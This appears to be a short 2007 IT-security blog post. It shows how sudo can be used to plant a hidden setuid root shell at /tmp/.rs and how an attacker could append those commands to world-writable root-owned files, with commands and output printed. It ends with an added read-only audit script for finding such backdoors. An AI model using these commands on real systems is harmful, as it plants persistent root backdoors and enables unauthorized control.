13.06.2007
It is not a vulnerability, but it is still an interesting way to get a root shell under Ubuntu. To do so, simply run the following script:
duddits@ubuntu:/home/duddits$ vi rs.sh
#!/bin/sh
sudo cp /bin/sh /tmp/.rs
sudo chmod 4755 /tmp/.rs
duddits@ubuntu:/home/duddits$ chmod 755 rs.sh
duddits@ubuntu:/home/duddits$ ./rs.sh
duddits@ubuntu:/home/duddits$ /tmp/.rs
# whoami
root
#
Depending on whether the user has already used sudo beforehand, running the script may or may not prompt for a password. What matters most is that the UID and GID are 0, i.e. that the owner and group of the file /tmp/.rs are those of root. A script is of course not strictly required; it would be enough to enter the commands directly at the command prompt. For an attacker this is naturally uninteresting, since they would have to know the user's password and could then just as well become root via
sudo su -
The only approach an attacker could pursue here would be to search for world-writable files that have root as both owner and group, and then append the two commands to them:
duddits@gentoo:~ $ find / -type f \( -perm -7 -o -perm -70 \) -gid 0 -uid 0 -exec ls -lA {} \;
-rwxrwxrwx 1 root root 80500 2007-06-13 12:26 /home/evil
duddits@gentoo:~ $ echo cp /bin/sh /tmp/.rs >> /home/evil
duddits@gentoo:~ $ echo chmod 4755 /tmp/.rs >> /home/evil
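From the defender's side, both conditions described above can be audited read-only. The following is an added example, not part of the original post; the function names are hypothetical, and the owner is a parameter (default uid 0) so the checks can be tried without root.

```shell
#!/bin/sh
# Added example (not from the original post): read-only audit for the two
# conditions the post describes. All function names are hypothetical.

# Setuid files owned by OWNER (default: uid 0) below DIR.
find_setuid_owned() {
    find "$1" -xdev -type f -user "${2:-0}" -perm -4000 2>/dev/null
}

# Files owned by OWNER that group or others are allowed to write to.
find_writable_owned() {
    find "$1" -xdev -type f -user "${2:-0}" \
        \( -perm -0002 -o -perm -0020 \) 2>/dev/null
}

# True if FILE is byte-identical to one of the given shells
# (default: /bin/sh), i.e. a copy like the /tmp/.rs from the post.
is_shell_copy() {
    f=$1; shift
    [ $# -gt 0 ] || set -- /bin/sh
    for s in "$@"; do
        cmp -s "$f" "$s" && return 0
    done
    return 1
}

# One finding per line: SUID-SHELL-COPY, SUID or WRITABLE, then the path.
audit_report() {
    dir=${1:-/}; owner=${2:-0}
    find_setuid_owned "$dir" "$owner" | while IFS= read -r f; do
        if is_shell_copy "$f"; then
            printf 'SUID-SHELL-COPY %s\n' "$f"
        else
            printf 'SUID %s\n' "$f"
        fi
    done
    find_writable_owned "$dir" "$owner" | sed 's/^/WRITABLE /'
}

# Run a scan only when asked to: ./audit.sh --scan /
if [ "${1:-}" = "--scan" ]; then
    audit_report "${2:-/}"
fi
```

Plain SUID lines include legitimate system binaries, so compare them against a known-good baseline; a SUID-SHELL-COPY line or a WRITABLE line for a file that root executes warrants immediate review.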
Categories: IT-Security